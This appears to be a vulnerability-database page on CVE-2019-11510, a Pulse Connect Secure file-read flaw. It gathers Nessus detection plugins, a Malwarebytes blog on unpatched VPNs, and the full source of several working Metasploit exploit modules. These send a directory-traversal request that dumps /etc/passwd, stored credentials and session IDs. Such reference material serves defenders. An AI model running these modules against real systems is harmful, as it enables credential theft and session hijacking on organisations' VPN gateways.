ID CVE-2019-11510 Type cve Reporter cve@mitre.org Modified 2019-10-03T18:15:00
Description
In Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote attacker can send a specially crafted URI to perform an arbitrary file reading vulnerability .
{"nessus": [{"lastseen": "2020-01-01T01:12:52", "bulletinFamily": "scanner", "description": "According to its self-reported version, the version of Pulse Connect Secure running on the remote host is prior to \n8.1R15.1, 8.2.x < 8.2R12.1, 8.3.x < 8.3R7.1 or 9.x prior to 9.0R3.4. It is, therefore, affected by an arbitrary file \nread vulnerability due to insufficient user input validation. An unauthenticated, remote attacker can exploit this, by \nrequesting a specially crafted URI, to read arbitrary files and disclose sensitive information.", "modified": "2020-01-02T00:00:00", "id": "PULSE_CONNECT_SECURE-CVE-2019-11510.NASL", "href": "https://www.tenable.com/plugins/nessus/127908", "published": "2019-08-16T00:00:00", "title": "Pulse Connect Secure Arbitrary File Read Vulnerability (CVE-2019-11510)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(127908);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\"CVE-2019-11510\");\n script_bugtraq_id(108073);\n script_xref(name:\"IAVA\", value:\"2019-A-0309\");\n\n script_name(english:\"Pulse Connect Secure Arbitrary File Read Vulnerability (CVE-2019-11510)\");\n script_summary(english:\"Checks Pulse Connect Secure version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by an arbitrary file read vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the version of Pulse Connect Secure running on the remote host is prior to \n8.1R15.1, 8.2.x < 8.2R12.1, 8.3.x < 8.3R7.1 or 9.x prior to 9.0R3.4. It is, therefore, affected by an arbitrary file \nread vulnerability due to insufficient user input validation. An unauthenticated, remote attacker can exploit this, by \nrequesting a specially crafted URI, to read arbitrary files and disclose sensitive information.\");\n # https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d23f9165\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 8.1R15.1, 8.2R12.1, 8.3R7.1, 9.0R3.4, or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-11510\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Pulse Connect Secure File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/04/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:pulse_secure:pulse_connect_secure\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"pulse_connect_secure_detect.nbin\");\n script_require_keys(\"installed_sw/Pulse Connect Secure\");\n script_require_ports(443);\n\n exit(0);\n}\n\n# Deprecated\nexit(0, 'This plugin has been deprecated. Use pulse_connect_secure-sa-44101.nasl (plugin ID 124766) instead.');\n\ninclude('vcf.inc');\n\napp_info = vcf::get_app_info(app:'Pulse Connect Secure', port:443, webapp:TRUE);\n\nconstraints = [\n {'fixed_version' : '8.1R15.1'},\n {'min_version' : '8.2' , 'fixed_version' : '8.2R12.1'},\n {'min_version' : '8.3' , 'fixed_version' : '8.3R7.1'},\n {'min_version' : '9.0' , 'fixed_version' : '9.0R3.4'},\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-01T01:12:52", "bulletinFamily": "scanner", "description": "According to its self-reported version, the version of Pulse Connect\nSecure running on the remote host is affected by multiple\nvulnerabilities.\n\n - An arbitrary file read vulnerability exists in PCS. An\n unauthenticated, remote attacker can exploit this, via specially\n crafted URI, to read arbitrary files and disclose sensitive\n information. (CVE-2019-11510)\n\n - Multiple vulnerabilities are found in Ghostscript.(CVE-2018-16513\n , CVE-2018-18284, CVE-2018-15911, CVE-2018-15910, CVE-2018-15909)\n\n - A session hijacking vulnerability exists in PCS. An\n unauthenticated, remote attacker can exploit this, to perform\n actions in the user or administrator interface with the\n privileges of another user. (CVE-2019-11540)\n\n - An authentication leaks seen in users using SAML authentication\n with the reuse existing NC (Pulse) session option.\n (CVE-2019-11541)\n\n - Multiple vulnerabilities found in the admin web interface of PCS.\n (CVE-2019-11543, CVE-2019-11542, CVE-2019-11509, CVE-2019-11539)\n\n - Multiple vulnerabilities found in Network File Share (NFS) of PCS\n , allows the attacker to read/write arbitrary files on the\n affected device. (CVE-2019-11538, CVE-2019-11508)\n\n - A cross-site scripting (XSS) vulnerability exists in application\n launcher page due to improper validation of user-supplied input\n before returning it to users. An attacker can exploit this, by\n convincing a user to click a specially crafted URL, to execute\n arbitrary script code in a user", "modified": "2020-01-02T00:00:00", "id": "PULSE_CONNECT_SECURE-SA-44101.NASL", "href": "https://www.tenable.com/plugins/nessus/124766", "published": "2019-05-10T00:00:00", "title": "Pulse Connect Secure Multiple Vulnerabilities (SA44101)", "type": "nessus", "sourceData": "#\n# (c) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(124766);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2018-15909\",\n \"CVE-2018-15910\",\n \"CVE-2018-15911\",\n \"CVE-2018-16513\",\n \"CVE-2018-18284\",\n \"CVE-2019-11507\",\n \"CVE-2019-11508\",\n \"CVE-2019-11509\",\n \"CVE-2019-11510\",\n \"CVE-2019-11538\",\n \"CVE-2019-11539\",\n \"CVE-2019-11540\",\n \"CVE-2019-11541\",\n \"CVE-2019-11542\",\n \"CVE-2019-11543\"\n );\n script_bugtraq_id(105122, 107451, 108073);\n script_xref(name:\"IAVA\", value:\"2019-A-0309\");\n script_xref(name:\"IAVA\", value:\"0001-A-0001\");\n\n script_name(english:\"Pulse Connect Secure Multiple Vulnerabilities (SA44101)\");\n script_summary(english:\"Checks PCS version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the version of Pulse Connect\nSecure running on the remote host is affected by multiple\nvulnerabilities.\n\n - An arbitrary file read vulnerability exists in PCS. An\n unauthenticated, remote attacker can exploit this, via specially\n crafted URI, to read arbitrary files and disclose sensitive\n information. (CVE-2019-11510)\n\n - Multiple vulnerabilities are found in Ghostscript.(CVE-2018-16513\n , CVE-2018-18284, CVE-2018-15911, CVE-2018-15910, CVE-2018-15909)\n\n - A session hijacking vulnerability exists in PCS. An\n unauthenticated, remote attacker can exploit this, to perform\n actions in the user or administrator interface with the\n privileges of another user. (CVE-2019-11540)\n\n - An authentication leaks seen in users using SAML authentication\n with the reuse existing NC (Pulse) session option.\n (CVE-2019-11541)\n\n - Multiple vulnerabilities found in the admin web interface of PCS.\n (CVE-2019-11543, CVE-2019-11542, CVE-2019-11509, CVE-2019-11539)\n\n - Multiple vulnerabilities found in Network File Share (NFS) of PCS\n , allows the attacker to read/write arbitrary files on the\n affected device. (CVE-2019-11538, CVE-2019-11508)\n\n - A cross-site scripting (XSS) vulnerability exists in application\n launcher page due to improper validation of user-supplied input\n before returning it to users. An attacker can exploit this, by\n convincing a user to click a specially crafted URL, to execute\n arbitrary script code in a user's browser session.\n (CVE-2019-11507)\n\nRefer to the vendor advisory for additional information.\");\n # https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d23f9165\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the appropriate version referenced in the advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-11540\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Pulse Connect Secure File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Pulse Secure VPN Arbitrary Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:pulse_secure:pulse_connect_secure\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"pulse_connect_secure_detect.nbin\");\n script_require_keys(\"installed_sw/Pulse Connect Secure\");\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nport = get_http_port(default:443, embedded:TRUE);\napp_info = vcf::pulse_connect_secure::get_app_info(app:'Pulse Connect Secure', port:port, full_version:TRUE);\n\nconstraints = [\n {'min_version' : '8.3.1', 'fixed_version':'8.3.7.65025', 'fixed_display' : '8.3R7.1'},\n {'min_version' : '8.2.1', 'fixed_version':'8.2.12.64003', 'fixed_display' : '8.2R12.1'},\n {'min_version' : '8.1.1', 'fixed_version':'8.1.15.59747', 'fixed_display' : '8.1R15.1'},\n {'min_version' : '9.0.1', 'fixed_version':'9.0.3.64053', 'fixed_display' : '9.0R3.4 / 9.0R4'}\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2019-12-04T20:01:09", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category web applications", "modified": "2019-08-21T00:00:00", "published": "2019-08-21T00:00:00", "id": "1337DAY-ID-33140", "href": "https://0day.today/exploit/description/33140", "title": "Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Arbitrary File Disclosure Exploit", "type": "zdt", "sourceData": "# Exploit Title: File disclosure in Pulse Secure SSL VPN (metasploit)\r\n# Google Dork: inurl:/dana-na/ filetype:cgi\r\n# Exploit Author: 0xDezzy (Justin Wagner), Alyssa Herrera\r\n# Vendor Homepage: https://pulsesecure.net\r\n# Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4\r\n# Tested on: Linux\r\n# CVE : CVE-2019-11510 \r\nrequire 'msf/core'\r\nclass MetasploitModule < Msf::Auxiliary\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\tinclude Msf::Post::File\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Pulse Secure - System file leak',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tPulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests.\r\n This exploit reads /etc/passwd as a proof of concept\r\n This vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4\r\n\t\t\t},\r\n\t\t\t'References' =>\r\n\t\t\t [\r\n\t\t\t [ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510' ]\r\n\t\t\t ],\r\n\t\t\t'Author' => [ '0xDezzy (Justin Wagner), Alyssa Herrera' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t 'DefaultOptions' =>\r\n\t\t {\r\n\t\t 'RPORT' => 443,\r\n\t\t 'SSL' => true\r\n\t\t },\r\n\t\t\t))\r\n\r\n\tend\r\n\r\n\r\n\tdef run()\r\n\t\tprint_good(\"Checking target...\")\r\n\t\tres = send_request_raw({'uri'=>'/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'},1342)\r\n\r\n\t\tif res && res.code == 200\r\n\t\t\tprint_good(\"Target is Vulnerable!\")\r\n\t\t\tdata = res.body\r\n\t\t\tcurrent_host = datastore['RHOST']\r\n\t\t\tfilename = \"msf_sslwebsession_\"+current_host+\".bin\"\r\n\t\t\tFile.delete(filename) if File.exist?(filename)\r\n\t\t\tfile_local_write(filename, data)\r\n\t\t\tprint_good(\"Parsing file.......\")\r\n\t\t\tparse()\r\n\t\telse\r\n\t\t\tif(res && res.code == 404)\r\n\t\t\t\tprint_error(\"Target not Vulnerable\")\r\n\t\t\telse\r\n\t\t\t\tprint_error(\"Ooof, try again...\")\r\n\t\t\tend\r\n\t\tend\r\n\tend\r\n\tdef parse()\r\n\t\tcurrent_host = datastore['RHOST']\r\n\r\n\t fileObj = File.new(\"msf_sslwebsession_\"+current_host+\".bin\", \"r\")\r\n\t words = 0\r\n\t while (line = fileObj.gets)\r\n\t \tprintable_data = line.gsub(/[^[:print:]]/, '.')\r\n\t \tarray_data = printable_data.scan(/.{1,60}/m)\r\n\t \tfor ar in array_data\r\n\t \t\tif ar != \"............................................................\"\r\n\t \t\t\tprint_good(ar)\r\n\t \t\tend\r\n\t \tend\r\n\t \t#print_good(printable_data)\r\n\r\n\t\tend\r\n\t\tfileObj.close\r\n\tend\r\nend\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://0day.today/exploit/33140"}], "dsquare": [{"lastseen": "2019-09-21T09:45:20", "bulletinFamily": "exploit", "description": "File disclosure vulnerability in Pulse Connect Secure SSL VPN\n\nVulnerability Type: File Disclosure", "modified": "2019-08-27T00:00:00", "published": "2019-08-27T00:00:00", "id": "E-688", "href": "", "type": "dsquare", "title": "Pulse Connect Secure File Disclosure", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2019-08-21T09:35:48", "bulletinFamily": "exploit", "description": "", "modified": "2019-08-21T00:00:00", "published": "2019-08-21T00:00:00", "id": "EDB-ID:47297", "href": "https://www.exploit-db.com/exploits/47297", "type": "exploitdb", "title": "Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Arbitrary File Disclosure (metasploit)", "sourceData": "# Exploit Title: File disclosure in Pulse Secure SSL VPN (metasploit)\r\n# Google Dork: inurl:/dana-na/ filetype:cgi\r\n# Date: 8/20/2019\r\n# Exploit Author: 0xDezzy (Justin Wagner), Alyssa Herrera\r\n# Vendor Homepage: https://pulsesecure.net\r\n# Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4\r\n# Tested on: Linux\r\n# CVE : CVE-2019-11510 \r\nrequire 'msf/core'\r\nclass MetasploitModule < Msf::Auxiliary\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\tinclude Msf::Post::File\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Pulse Secure - System file leak',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tPulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests.\r\n This exploit reads /etc/passwd as a proof of concept\r\n This vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4\r\n\t\t\t},\r\n\t\t\t'References' =>\r\n\t\t\t [\r\n\t\t\t [ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510' ]\r\n\t\t\t ],\r\n\t\t\t'Author' => [ '0xDezzy (Justin Wagner), Alyssa Herrera' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t 'DefaultOptions' =>\r\n\t\t {\r\n\t\t 'RPORT' => 443,\r\n\t\t 'SSL' => true\r\n\t\t },\r\n\t\t\t))\r\n\r\n\tend\r\n\r\n\r\n\tdef run()\r\n\t\tprint_good(\"Checking target...\")\r\n\t\tres = send_request_raw({'uri'=>'/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'},1342)\r\n\r\n\t\tif res && res.code == 200\r\n\t\t\tprint_good(\"Target is Vulnerable!\")\r\n\t\t\tdata = res.body\r\n\t\t\tcurrent_host = datastore['RHOST']\r\n\t\t\tfilename = \"msf_sslwebsession_\"+current_host+\".bin\"\r\n\t\t\tFile.delete(filename) if File.exist?(filename)\r\n\t\t\tfile_local_write(filename, data)\r\n\t\t\tprint_good(\"Parsing file.......\")\r\n\t\t\tparse()\r\n\t\telse\r\n\t\t\tif(res && res.code == 404)\r\n\t\t\t\tprint_error(\"Target not Vulnerable\")\r\n\t\t\telse\r\n\t\t\t\tprint_error(\"Ooof, try again...\")\r\n\t\t\tend\r\n\t\tend\r\n\tend\r\n\tdef parse()\r\n\t\tcurrent_host = datastore['RHOST']\r\n\r\n\t fileObj = File.new(\"msf_sslwebsession_\"+current_host+\".bin\", \"r\")\r\n\t words = 0\r\n\t while (line = fileObj.gets)\r\n\t \tprintable_data = line.gsub(/[^[:print:]]/, '.')\r\n\t \tarray_data = printable_data.scan(/.{1,60}/m)\r\n\t \tfor ar in array_data\r\n\t \t\tif ar != \"............................................................\"\r\n\t \t\t\tprint_good(ar)\r\n\t \t\tend\r\n\t \tend\r\n\t \t#print_good(printable_data)\r\n\r\n\t\tend\r\n\t\tfileObj.close\r\n\tend\r\nend", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://www.exploit-db.com/download/47297"}], "metasploit": [{"lastseen": "2020-01-20T17:33:39", "bulletinFamily": "exploit", "description": "This module exploits a pre-auth directory traversal in the Pulse Secure VPN server to dump an arbitrary file. Dumped files are stored in loot. If the \"Automatic\" action is set, plaintext and hashed credentials, as well as session IDs, will be dumped. Valid sessions can be hijacked by setting the \"DSIG\" browser cookie to a valid session ID. For the \"Manual\" action, please specify a file to dump via the \"FILE\" option. /etc/passwd will be dumped by default. If the \"PRINT\" option is set, file contents will be printed to the screen, with any unprintable characters replaced by a period. Please see related module exploit/linux/http/pulse_secure_cmd_exec for a post-auth exploit that can leverage the results from this module.\n", "modified": "2020-01-14T06:34:06", "published": "2019-08-21T20:58:58", "id": "MSF:AUXILIARY/GATHER/PULSE_SECURE_FILE_DISCLOSURE", "href": "", "type": "metasploit", "title": "Pulse Secure VPN Arbitrary File Disclosure", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Pulse Secure VPN Arbitrary File Disclosure',\n 'Description' => %q{\n This module exploits a pre-auth directory traversal in the Pulse Secure\n VPN server to dump an arbitrary file. Dumped files are stored in loot.\n\n If the \"Automatic\" action is set, plaintext and hashed credentials, as\n well as session IDs, will be dumped. Valid sessions can be hijacked by\n setting the \"DSIG\" browser cookie to a valid session ID.\n\n For the \"Manual\" action, please specify a file to dump via the \"FILE\"\n option. /etc/passwd will be dumped by default. If the \"PRINT\" option is\n set, file contents will be printed to the screen, with any unprintable\n characters replaced by a period.\n\n Please see related module exploit/linux/http/pulse_secure_cmd_exec for\n a post-auth exploit that can leverage the results from this module.\n },\n 'Author' => [\n 'Orange Tsai', # Discovery (@orange_8361)\n 'Meh Chang', # Discovery (@mehqq_)\n 'Alyssa Herrera', # PoC (@Alyssa_Herrera_)\n 'Justin Wagner', # Module (@0xDezzy)\n 'wvu' # Module\n ],\n 'References' => [\n ['CVE', '2019-11510'],\n ['URL', 'https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/'],\n ['URL', 'https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html'],\n ['URL', 'https://hackerone.com/reports/591295']\n ],\n 'DisclosureDate' => '2019-04-24', # Public disclosure\n 'License' => MSF_LICENSE,\n 'Actions' => [\n ['Automatic', 'Description' => 'Dump creds and sessions'],\n ['Manual', 'Description' => 'Dump an arbitrary file (FILE option)']\n ],\n 'DefaultAction' => 'Automatic',\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true,\n 'HttpClientTimeout' => 5 # This seems sane\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [IOC_IN_LOGS],\n 'RelatedModules' => ['exploit/linux/http/pulse_secure_cmd_exec']\n }\n ))\n\n register_options([\n OptString.new(\n 'FILE',\n [\n true,\n 'File to dump (manual mode only)',\n '/etc/passwd'\n ]\n ),\n OptBool.new(\n 'PRINT',\n [\n false,\n 'Print file contents (manual mode only)',\n true\n ]\n )\n ])\n end\n\n def the_chosen_one\n return datastore['FILE'], 'User-chosen file'\n end\n\n def run\n files =\n case action.name\n when 'Automatic'\n print_status('Running in automatic mode')\n\n # Order by most sensitive first\n [\n plaintext_creds,\n session_ids,\n hashed_creds\n ]\n when 'Manual'\n print_status('Running in manual mode')\n\n # /etc/passwd by default\n [the_chosen_one]\n end\n\n files.each do |path, info|\n print_status(\"Dumping #{path}\")\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => dir_traversal(path),\n 'partial' => true # Allow partial response due to timeout\n )\n\n unless res\n fail_with(Failure::Unreachable, \"Could not dump #{path}\")\n end\n\n handle_response(res, path, info)\n end\n end\n\n def handle_response(res, path, info)\n case res.code\n when 200\n case action.name\n when 'Automatic'\n # TODO: Parse plaintext and hashed creds\n if path == session_ids.first\n print_status('Parsing session IDs...')\n\n parse_sids(res.body).each do |sid|\n print_good(\"Session ID found: #{sid}\")\n end\n end\n when 'Manual'\n printable = res.body.gsub(/[^[:print:][:space:]]/, '.')\n\n print_line(printable) if datastore['PRINT']\n end\n\n print_good(store_loot(\n self.name, # ltype\n 'application/octet-stream', # ctype\n rhost, # host\n res.body, # data\n path, # filename\n info # info\n ))\n when 302\n fail_with(Failure::NotVulnerable, \"Redirected to #{res.redirection}\")\n when 400\n print_error(\"Invalid path #{path}\")\n when 404\n print_error(\"#{path} not found\")\n else\n print_error(\"I don't know what a #{res.code} code is\")\n end\n end\n\n def dir_traversal(path)\n normalize_uri(\n '/dana-na/../dana/html5acc/guacamole/../../../../../..',\n \"#{path}?/dana/html5acc/guacamole/\" # Bypass query/vars_get\n )\n end\n\n def parse_sids(body)\n body.to_s.scan(/randomVal([[:xdigit:]]+)/).flatten.reverse\n end\n\n def plaintext_creds\n return '/data/runtime/mtmp/lmdb/dataa/data.mdb', 'Plaintext credentials'\n end\n\n def session_ids\n return '/data/runtime/mtmp/lmdb/randomVal/data.mdb', 'Session IDs'\n end\n\n def hashed_creds\n return '/data/runtime/mtmp/system', 'Hashed credentials'\n end\n\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/pulse_secure_file_disclosure.rb"}], "malwarebytes": [{"lastseen": "2019-10-18T17:31:38", "bulletinFamily": "blog", "description": "In April 2019, Pulse Secure published an advisory about a vulnerability in their software. In August, cybercriminals were massively scanning for systems that were running a vulnerable version. Now it\u2019s October, and still many organizations have not applied the patches that are available for this vulnerability. \n\nThis is a trend we've seen repeated with dozens of other publicly-known vulnerabilities and organizations that are slow to update software to the latest, most secure versions. \n\nWith so many organizations falling victim to cyberattack via exploited vulnerability, we have to ask: Why aren't people patching?\n\n### What are the vulnerabilities?\n\nReading the above, you might suspect that the vulnerabilities were not serious or hard to exploit. But that's not the impression we get from the Pulse Secure advisory. It states:\n\n> \u201cMultiple vulnerabilities were discovered and have been resolved in Pulse Connect Secure (PCS) and Pulse Policy Secure (PPS). This includes an authentication by-pass vulnerability that can allow an unauthenticated user to perform a remote arbitrary file access on the Pulse Connect Secure gateway. This advisory also includes a remote code execution vulnerability that can allow an authenticated administrator to perform remote code execution on Pulse Connect Secure and Pulse Policy Secure gateways.\u201d\n\nPulse Connect Secure is a VPN solution for organizations and offers remote users a secure connection to the corporate network so they can remotely log in and work. Pulse Policy Secure is a well-known Network Access Control solution, which does not only control who can connect but also assigns the appropriate permissions.\n\nWhen it comes to software like this, an authentication by-pass vulnerability is a serious problem. Any criminal with the proper knowledge can pretend to be an employee and access company resources. In this case, https access and the use of an especially-prepared URL would be enough to read an arbitrary file on a vulnerable system.\n\nNeedless to say, that is a serious problem\u2014and we haven\u2019t even touched on the remote code execution possibility. Every hacker's dream is to be able to run their code on your system. That gives them a foothold within your network from which they can expand their activities. They can plant ransomware or whatever else they fancy.\n\n### Where would they get the necessary knowledge\n\nBy design, many cybercriminals are opportunistic, and they will jump at any easy copy-and-paste job that renders enough cash. So, when the vulnerability was discussed elaborately at Black Hat in early August, the method to exploit the vulnerability became general knowledge. \n\nSince using this method hardly requires expert knowledge, researchers soon noticed a lot of scanning activity by cybercriminals looking for vulnerable systems. The vulnerability in Pulse Secure was presented along with a [few vulnerabilities in other SSL VPN products](<https://www.blackhat.com/us-19/briefings/schedule/#infiltrating-corporate-intranet-like-nsa---pre-auth-rce-on-leading-ssl-vpns-15545>). Shortly after, an exploit for this vulnerability was published on GitHub, so every copycat could have it handy.\n\n### Unpatched\n\nOn Saturday, August 24, 2019, scans performed by [Bad Packets](<https://badpackets.net/over-14500-pulse-secure-vpn-endpoints-vulnerable-to-cve-2019-11510/>) found a total of 14,528 Pulse Secure VPN endpoints vulnerable to CVE-2019-11510. Over 5,000 of those were in the US, including military, federal, state, and local government agencies. \n\nA week later, 10,471 Pulse Secure VPN servers worldwide remained vulnerable to compromise. On Monday, September 16, 2019, there were still 7,712 left to be patched. On Monday, October 7, 2019, a surprising 6,018 remained, with a lot of active scanning going on\u2014and this was after advisories have been issued by the NSA and the NCSC.\n\n### Responsibility\n\nA basic question in cases like these is: Who is responsible for applying patches? Without doubt, we expect a vendor to develop a patch as soon as the vulnerability is made known to them, but what happens after that? \n\nIndustry leaders have long warned that vulnerability remediation and effective patch management are essential to keep organizations safe from cyberattacks. But there are a few essential steps in the delivery chain after the patch is released:\n\n * Customers need to be made aware of the patch and the required urgency.\n * Security providers or resellers need to make sure their customers are aware of the existence of the patch and the possible consequences of not applying it.\n * Organizations need to have a department or external provider that is responsible for keeping the security software updated. Spending money on top-notch software and then leaving it unattended is a sure waste of money. Keeping software in shape is not limited to applying patches, but security patches can sometimes be more important than fetching the latest rules update.\n\nThe natural next question, then, is why aren't organizations applying patches as soon as they know about them? \n\n* * *\n\n_Recommended reading: _[Tackling the shortage in skilled IT staff: whole team security](<https://blog.malwarebytes.com/security-world/business-security-world/2019/02/tackling-the-shortage-in-skilled-it-staff-whole-team-security/>)\n\n* * *\n\n### So, what\u2019s stopping them from applying the patch?\n\nAssuming that an organization's IT or security team is aware of the patch, possible reasons for holding off might be fear of disrupted processes or a possible disagreement on what they might regard as critical. But the possible consequences of an unpatched critical vulnerability should heavily outweigh those concerns. \n\nThere could be several other reasons for not applying patches as soon as they are available:\n\n * Understaffed IT and security teams \n * Looking into the consequences first, which could slow down the process due to lack of feedback\n * Waiting for others to share their experiences before applying patches \n * Unaware of the patch's existence, sometimes as a result of not having time to follow up on emails and warning signs\n * Lack of a point of contact. Whose problem is it? And whose job is to solve it?\n\nAs you can see, most of these can be traced back to a lack of staff and time, and sometimes funding is responsible for those two shortages. But sometimes understaffing is because of [other reasons.](<https://blog.malwarebytes.com/security-world/2018/06/whats-causing-the-cybersecurity-skills-gap/>) And once you are understaffed, the lack of time to follow up on problems comes as a logical consequence.\n\n### The Pulse vulnerability is not alone\n\nIt\u2019s not like the Pulse vulnerability is the only VPN-related vulnerability out there (or any software vulnerability, for that matter). Similar problems are known to exist in products from Fortinet and Palo Alto. \n\nIn an [advisory](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>) from the National Cyber Security Center (NCSC) in the UK, users of the affected VPN products can find 